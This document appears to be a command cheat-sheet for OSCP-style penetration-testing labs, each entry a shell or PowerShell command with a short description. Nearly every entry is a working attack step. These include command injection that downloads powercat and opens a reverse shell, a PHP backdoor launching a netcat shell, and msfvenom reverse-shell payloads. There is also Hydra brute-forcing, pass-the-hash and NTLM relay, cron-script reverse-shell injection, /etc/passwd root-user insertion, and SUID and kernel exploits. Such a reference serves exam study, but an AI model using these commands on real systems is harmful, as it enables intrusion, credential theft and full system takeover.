- cmd: curl -X POST --data 'Archive=git' http://192.168.50.189:8000/archive
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Entering git as command
|
||
- cmd: curl -X POST --data 'Archive=git version' http://192.168.50.189:8000/archive
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using git version to detect the operating system
|
||
- cmd: curl -X POST --data 'Archive=git%3Bipconfig' http://192.168.50.189:8000/archive
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Entering git and ipconfig with encoded semicolon
|
||
- cmd: curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.50.189:8000/archive
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Determining where the injected commands are executed
|
||
- cmd: curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell' http://192.168.50.189:8000/archive
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Downloading Powercat and creating a reverse shell via Command Injection
|
||
- cmd: mysql -u root -p'root' -h 192.168.50.16 -P 3306
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Connecting to the remote MySQL instance
|
||
- cmd: impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Connecting to the Remote MSSQL instance via Impacket
|
||
- cmd: impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth ; EXECUTE sp_configure 'show advanced options', 1; ; RECONFIGURE; ; EXECUTE sp_configure 'xp_cmdshell', 1; ; RECONFIGURE;
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Enabling xp_cmdshell feature
|
||
- cmd: sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Running sqlmap to quickly find SQL injection points
|
||
- cmd: sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Running sqlmap to Dump Users Credentials Table
|
||
- cmd: sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Running sqlmap with osshell
|
||
- cmd: pip3 install wsgidav
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Installing pip3 and WsgiDAV
|
||
- cmd: wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Starting WsgiDAV on port 80
|
||
- cmd: firefox --search "Microsoft Edge site:exploit-db.com"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using Google to search for
|
||
- cmd: sudo apt update && sudo apt install exploitdb
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Updating the exploitdb package from the
|
||
- cmd: ls -1 /usr/share/exploitdb/
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing the two major sections in the archive
|
||
- cmd: ls -1 /usr/share/exploitdb/exploits
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing the content of the exploits
|
||
- cmd: searchsploit
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The searchsploit command syntax
|
||
- cmd: searchsploit remote smb microsoft windows
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using searchsploit to list available
|
||
- cmd: searchsploit -m windows/remote/48537.py ; searchsploit -m 42031
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The exploits are copied the
|
||
- cmd: searchsploit -m 50944
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The exploit is copied into our current working directory
|
||
- cmd: python3 50944.py -url http://192.168.50.11/project/ -u george@AIDevCorp.org -p AIDevCorp
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The exploit completed successfully with an uploaded file
|
||
- cmd: curl http://192.168.50.11/project/uploads/users/420919-backdoor.php?cmd=whoami
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The PHP script was executed by the wwwdata system account
|
||
- cmd: curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=which nc"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: nc is installed on the target
|
||
- cmd: curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=nc -nv 192.168.50.129 6666 -e /bin/bash"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The reverse netcat shell is executed and the terminal session does not respond
|
||
- cmd: searchsploit "Sync Breeze Enterprise 10.0.28"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Searching for available
|
||
- cmd: searchsploit -m 42341
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using searchsploit to copy
|
||
- cmd: sudo apt install mingw-w64
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Installing the mingww64 crosscompiler in Kali
|
||
- cmd: i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Errors displayed after attempting
|
||
- cmd: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using msfvenom to generate a
|
||
- cmd: sudo wine syncbreeze_exploit.exe
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Running the Windows exploit using
|
||
- cmd: i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Compiling the exploit and setting up
|
||
- cmd: wine syncbreeze_exploit.exe
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Running the final version of the
|
||
- cmd: curl -k https://192.168.50.45/uploads/shell.php?cmd=whoami
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Verifying if our exploit was
|
||
- cmd: xxd -b malware.txt
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Inspecting the binary file content with xxd
|
||
- cmd: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f exe > binary.exe
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Generating a malicious PE
|
||
- cmd: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f powershell -v sc
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Generating a PowerShell compatible
|
||
- cmd: .\bypass.ps1
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Attempting to run the script
|
||
- cmd: Get-ExecutionPolicy -Scope CurrentUser ; Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser ; A ; Get-ExecutionPolicy -Scope CurrentUser
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Changing the ExecutionPolicy for our
|
||
- cmd: apt-cache search shellter ; sudo apt install shellter
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Installing shellter in Kali Linux
|
||
- cmd: sudo apt install wine
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Installing wine in Kali Linux
|
||
- cmd: msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.50.1;set LPORT 443;run;"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Setting up a handler for the meterpreter payload
|
||
- cmd: cd /usr/share/wordlists/ ; ls ; sudo gzip -d rockyou.txt.gz ; hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Unzipping Gzip Archive and attacking SSH
|
||
- cmd: hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Spraying a password on RDP service
|
||
- cmd: hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Successful Dictionary Attack on the Login Form
|
||
- cmd: echo -n "secret" | sha256sum ; echo -n "secret" | sha256sum ; echo -n "secret1" | sha256sum
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Comparing resulting hash values for secret and secret1
|
||
- cmd: echo -n "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" | wc -c ; python3 -c "print(62**5)"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Calculating the keyspace for a password of length 5
|
||
- cmd: hashcat -b
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Benchmark CPU with MD5, SHA1, and SHA2256
|
||
- cmd: python3 -c "print(916132832 / 134200000)" ; python3 -c "print(916132832 / 9276300000)"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Calculating the cracking time for password length of 5
|
||
- cmd: hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Cracking a MD5 Hash with Hashcat and a mutated rockyou.txt wordlist
|
||
- cmd: ls -la /usr/share/hashcat/rules/
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing of Hashcat's rule files
|
||
- cmd: ls -la Database.kdbx ; keepass2john Database.kdbx > keepass.hash ; cat keepass.hash
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using keepass2john to format the KeePass database for Hashcat
|
||
- cmd: cat keepass.hash
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Correct hash format for Hashcat without "Database:"
|
||
- cmd: hashcat --help | grep -i "KeePass"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Finding the mode of KeePass in Hashcat
|
||
- cmd: hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Cracking the KeePass database hash
|
||
- cmd: chmod 600 id_rsa ; ssh -i id_rsa -p 2222 dave@192.168.50.201 ; yes ; ssh -i id_rsa -p 2222 dave@192.168.50.201
|
||
lang: sh
|
||
tags: oscp
|
||
desc: SSH connection attempts with the private key
|
||
- cmd: ssh2john id_rsa > ssh.hash ; cat ssh.hash
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using ssh2john to format the hash
|
||
- cmd: hashcat -h | grep -i "ssh"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Determine the correct mode for Hashcat
|
||
- cmd: hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --force
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Failed cracking attempt with Hashcat
|
||
- cmd: cat ssh.rule ; sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Adding the named rules to the JtR configuration file
|
||
- cmd: john --wordlist=ssh.passwords --rules=sshRules ssh.hash
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Cracking the hash with JtR
|
||
- cmd: ssh -i id_rsa -p 2222 dave@192.168.50.201
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Entering Passphrase to connect to the target system with SSH
|
||
- cmd: Get-LocalUser
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Showing all local users in PowerShell
|
||
- cmd: hashcat --help | grep -i "ntlm"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Hashcat mode for NTLM hashes
|
||
- cmd: hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
|
||
lang: sh
|
||
tags: oscp
|
||
desc: NTLM hash of user nelly in nelly.hash and Hashcat mode
|
||
- cmd: impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
|
||
lang: sh
|
||
tags: oscp
|
||
desc: NTLM hash of user nelly in nelly.hash and Hashcat mode
|
||
- cmd: impacket-psexec relia.com/maildmz:DPuBT9tGCBrTbR@192.168.244.189
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using psexec to get an interactive shell
|
||
- cmd: impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using wmiexec to get an interactive shell
|
||
- cmd: ip a ; sudo responder -I tap0
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Starting Responder on interface tap0
|
||
- cmd: dir \\192.168.119.2\test
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using the dir command to create an SMB connection to our Kali machine
|
||
- cmd: cat paul.hash ; hashcat --help | grep -i "ntlm"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Contents of paul.hash and Hashcat mode
|
||
- cmd: hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Cracking the NetNTLMv2 hash of paul
|
||
- cmd: sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Starting ntlmrelayx for a Relayattack targeting FILES02
|
||
- cmd: dir \\192.168.119.2\test
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using the dir command to create an SMB connection to our Kali machine
|
||
- cmd: powershell ; Get-LocalUser
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Display local users on CLIENT220
|
||
- cmd: Get-LocalGroup
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Display local groups on CLIENTWK220
|
||
- cmd: Get-LocalGroupMember adminteam ; Get-LocalGroupMember Administrators
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Display members of the group adminteam
|
||
- cmd: systeminfo
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Information about the operating system and architecture
|
||
- cmd: ipconfig /all
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Information about the network configuration
|
||
- cmd: route print
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Routing table on CLIENTWK220
|
||
- cmd: netstat -ano
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Active network connections on CLIENTWK220
|
||
- cmd: Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname ; Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Installed applications on CLIENTWK220
|
||
- cmd: Get-Process
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Running processes on CLIENTWK220
|
||
- cmd: Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Searching for sensitive information in XAMPP directory
|
||
- cmd: type C:\xampp\passwords.txt ; type C:\xampp\mysql\bin\my.ini
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Review the contents of passwords.txt and my.ini
|
||
- cmd: Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Searching for text files and password manager databases in the home directory of dave
|
||
- cmd: cat Desktop\asdf.txt
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Contents of asdf.txt
|
||
- cmd: net user steve
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Local groups user steve is a member of
|
||
- cmd: type C:\xampp\mysql\bin\my.ini
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Contents of the my.ini file
|
||
- cmd: net user backupadmin
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Local groups backupadmin is a member of
|
||
- cmd: runas /user:backupadmin cmd
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using Runas to execute cmd as user backupadmin
|
||
- cmd: Get-History
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Empty result from GetHistory
|
||
- cmd: (Get-PSReadlineOption).HistorySavePath
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Display path of the history file from PSReadline
|
||
- cmd: type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Empty result from GetHistory
|
||
- cmd: type C:\Users\Public\Transcripts\transcript01.txt
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Contents of the transcript file
|
||
- cmd: $password = ConvertTo-SecureString "qwertqwertqwert123!!" -AsPlainText -Force ; $cred = New-Object System.Management.Automation.PSCredential("daveadmin", $password) ; Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using the commands from the transcript file to obtain a PowerShell session as daveadmin
|
||
- cmd: evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!"
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using evilwinrm to connect to CLIENTWK220 as daveadmin
|
||
- cmd: icacls "C:\xampp\apache\bin\httpd.exe"
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Permissions of _httpd.exe_
|
||
- cmd: x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
|
||
lang: sh
|
||
tags: oscp
|
||
desc: CrossCompile the C Code to a 64bit application
|
||
- cmd: iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe ; move C:\xampp\mysql\bin\mysqld.exe mysqld.exe ; move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Replacing mysqld.exe with our malicious binary
|
||
- cmd: net stop mysql
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Attempting to stop the service in order to restart it
|
||
- cmd: Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Obtain Startup Type for mysql service
|
||
- cmd: whoami /priv
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Checking for reboot privileges
|
||
- cmd: shutdown /r /t 0
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Rebooting the machine
|
||
- cmd: Get-LocalGroupMember administrators
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Display members of the local administrators group
|
||
- cmd: iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1 ; powershell -ep bypass ; . .\PowerUp.ps1 ; Get-ModifiableServiceFile
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Import PowerUp.ps1 and execute GetModifiableServiceFile
|
||
- cmd: Install-ServiceBinary -Name 'mysql'
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Error from AbuseFunction
|
||
- cmd: $ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe' | Get-ModifiablePath -Literal ; $ModifiableFiles ; $ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe argument' | Get-ModifiablePath -Literal ; $ModifiableFiles ; $ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe argument -conf=C:\test\path' | Get-ModifiablePath -Literal ; $ModifiableFiles
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Analyzing the function ModifiablePath
|
||
- cmd: icacls .\Documents\BetaServ.exe
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Displaying permissions on the binary of BetaService
|
||
- cmd: Restart-Service BetaService
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Restarting BetaService
|
||
- cmd: $env:path
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Display the PATH environment variable
|
||
- cmd: x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll
|
||
lang: sh
|
||
tags: oscp
|
||
desc: CrossCompile the C++ Code to a 64bit DLL
|
||
- cmd: Restart-Service BetaService ; net user ; net localgroup administrators
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Restart the service _BetaService_ and confirm _dave2_ was created as local administrator
|
||
- cmd: Get-CimInstance -ClassName win32_service | Select Name,State,PathName
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: List of services with binary path
|
||
- cmd: wmic service get name,pathname | findstr /i /v ...
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: List of services with spaces and missing quotes in the binary path
|
||
- cmd: Start-Service GammaService ; Stop-Service GammaService
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using StartService and StopService to check if user steve has permissions to start and stop GammaService
|
||
- cmd: icacls "C:\" ; icacls "C:\Program Files"
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Reviewing permissions on the paths __C:\\__ and __C:\\Program Files\\__
|
||
- cmd: icacls "C:\Program Files\Enterprise Apps"
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Reviewing permissions on the __Enterprise Apps__ directory
|
||
- cmd: iwr -uri http://192.168.119.3/adduser.exe -Outfile Current.exe ; copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Download adduser.exe, save it as Current.exe, and copy it to Enterprise Apps directory
|
||
- cmd: Start-Service GammaService ; net user ; net localgroup administrators
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Start service GammaService and confirm that dave2 was created as member of local Administrators group
|
||
- cmd: iwr http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1 ; powershell -ep bypass ; . .\PowerUp.ps1 ; Get-UnquotedService
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using GetUnquotedService to list potential vulnerable services
|
||
- cmd: Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe" ; Restart-Service GammaService ; net user ; net localgroup administrators
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using the AbuseFunction to exploit the unquoted service path of GammaService
|
||
- cmd: schtasks /query /fo LIST /v
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Display a list of all scheduled tasks on CLIENTWK220
|
||
- cmd: icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Display permissions on the executable file __BackendCacheCleanup.exe__
|
||
- cmd: iwr -Uri http://192.168.119.3/adduser.exe -Outfile BackendCacheCleanup.exe ; move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak ; move .\BackendCacheCleanup.exe .\Pictures\
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Download and replace executable file __BackendCacheCleanup.exe__
|
||
- cmd: net user ; net localgroup administrators
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Display permissions on the executable file __BackendCacheCleanup.exe__
|
||
- cmd: .\PrintSpoofer64.exe -i -c powershell.exe
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using the _PrintSpoofer_ tool to get an interactive PowerShell session in the context of NT AUTHORITY\\SYSTEM.
|
||
- cmd: ls -l /etc/shadow
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Inspecting file permissions and users ownership
|
||
- cmd: routel
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Printing the routes on Linux
|
||
- cmd: ss -anp
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing all
|
||
- cmd: cat /etc/iptables/rules.v4
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Inspecting custom IP tables
|
||
- cmd: ls -lah /etc/cron*
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing all cron
|
||
- cmd: crontab -l
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing cron jobs for the current user
|
||
- cmd: sudo crontab -l
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing cron jobs for the root user
|
||
- cmd: dpkg -l
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing all
|
||
- cmd: find / -writable -type d 2>/dev/null
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing all world
|
||
- cmd: cat /etc/fstab ; mount
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing content
|
||
- cmd: lsblk
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing all
|
||
- cmd: lsmod
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing loaded
|
||
- cmd: /sbin/modinfo libata
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Displaying
|
||
- cmd: find / -perm -u=s -type f 2>/dev/null
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Searching for
|
||
- cmd: env
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Inspecting Environment Variables
|
||
- cmd: cat .bashrc
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Inspecting .bashrc
|
||
- cmd: su - root
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Becoming 'root' user with the leaked credential
|
||
- cmd: crunch 6 6 -t Lab%%% > wordlist
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Generating a wordlist for a bruteforce attack
|
||
- cmd: cat wordlist
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Inspecting the Wordlist Content
|
||
- cmd: hydra -l eve -P wordlist 192.168.50.214 -t 4 ssh -V
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Successfully bruteforced eve's password
|
||
- cmd: ssh eve@192.168.50.214
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Successfully Logged in as eve
|
||
- cmd: sudo -i
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Elevating to root
|
||
- cmd: watch -n 1 "ps -aux | grep pass"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Harvesting Active Processes for Credentials
|
||
- cmd: sudo tcpdump -i lo -A | grep "pass"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using tcpdump to Perform Password Sniffing
|
||
- cmd: grep "CRON" /var/log/syslog
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Inspecting the cron log file
|
||
- cmd: cat /home/joe/.scripts/user_backups.sh ; ls -lah /home/joe/.scripts/user_backups.sh
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Showing the content and
|
||
- cmd: cd .scripts ; echo >> user_backups.sh ; echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <cr>192.168.118.2</cr> 1234 >/tmp/f" >> user_backups.sh ; cat user_backups.sh
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Inserting a reverse shell
|
||
- cmd: openssl passwd w00t ; echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd ; su root2 ; w00t ; id
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Escalating privileges by
|
||
- cmd: passwd
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Executing the passswd program
|
||
- cmd: ps u -C passwd
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Inspecting passwd's process credentials
|
||
- cmd: grep Uid /proc/1932/status
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Inspecting passwd's process credentials
|
||
- cmd: cat /proc/1131/status | grep Uid
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Inspecting passwd's process credentials
|
||
- cmd: ls -asl /usr/bin/passwd
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Revealing the SUID flag in the passwd binary application
|
||
- cmd: find /home/joe/Desktop -exec "/usr/bin/bash" -p \;
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Getting a root shell by abusing SUID program
|
||
- cmd: /usr/sbin/getcap -r / 2>/dev/null
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Manually Enumerating Capabilities
|
||
- cmd: perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' ; id
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Getting a root shell through capabilities exploitation
|
||
- cmd: sudo -l
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Inspecting current user's sudo permissions
|
||
- cmd: COMMAND='id' ; TF=$(mktemp) ; echo "$COMMAND" > $TF ; chmod +x $TF ; sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Attempting to abuse tcpdump sudo permissions
|
||
- cmd: cat /var/log/syslog | grep tcpdump
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Inspecting the syslog file for 'tcpdump' related events
|
||
- cmd: su - root ; aa-status
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Verifying AppArmon status
|
||
- cmd: sudo apt-get changelog apt ; id
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Obtaining a root shell by abusing sudo permissions
|
||
- cmd: cat /etc/issue
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Gathering general information on
|
||
- cmd: uname -r ; arch
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Gathering kernel and
|
||
- cmd: searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using searchsploit to
|
||
- cmd: cp /usr/share/exploitdb/exploits/linux/local/45010.c . ; head 45010.c -n 20
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Identifying the exploit source code instructions.
|
||
- cmd: mv 45010.c cve-2017-16995.c
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Renaming the Exploit
|
||
- cmd: gcc cve-2017-16995.c -o cve-2017-16995
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Compiling the Exploit on the target machine
|
||
- cmd: file cve-2017-16995
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Examining the exploit binary file's architecture
|
||
